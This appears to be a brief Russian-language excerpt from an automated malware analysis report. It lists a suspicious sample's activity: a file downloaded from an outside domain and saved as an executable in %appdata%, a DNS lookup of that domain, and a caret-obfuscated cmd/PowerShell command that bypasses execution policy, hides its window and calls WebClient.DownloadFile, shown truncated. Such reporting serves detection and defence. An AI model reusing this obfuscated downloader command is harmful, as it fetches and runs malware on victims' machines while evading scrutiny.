Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWeRs^HELL.exE -^EX^Ec^Ut^IonpOl^IC^Y ^bY^Pas^S ^-noP^roFilE ^-W^i^NdO^w^StYl^E HI^D^D^e^N^ ^(N^e^W^-OBj^E^CT^ s^yS^TeM^.n^ET.weBcLi^EnT).dOWNLOadfIL^e('http://www.zonedo...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "POWeRs^HELL.exE -^EX^Ec^Ut^IonpOl^IC^Y ^bY^Pas^S ^-noP^roFilE ^-W^i^NdO^w^StYl^E HI^D^D^e^N^ ^(N^e^W^-OBj^E^CT^ s^yS^TeM^.n^ET.weBcLi^EnT).dOWNLOadfIL^e('http://www.zonedo...' (со скрытым окном)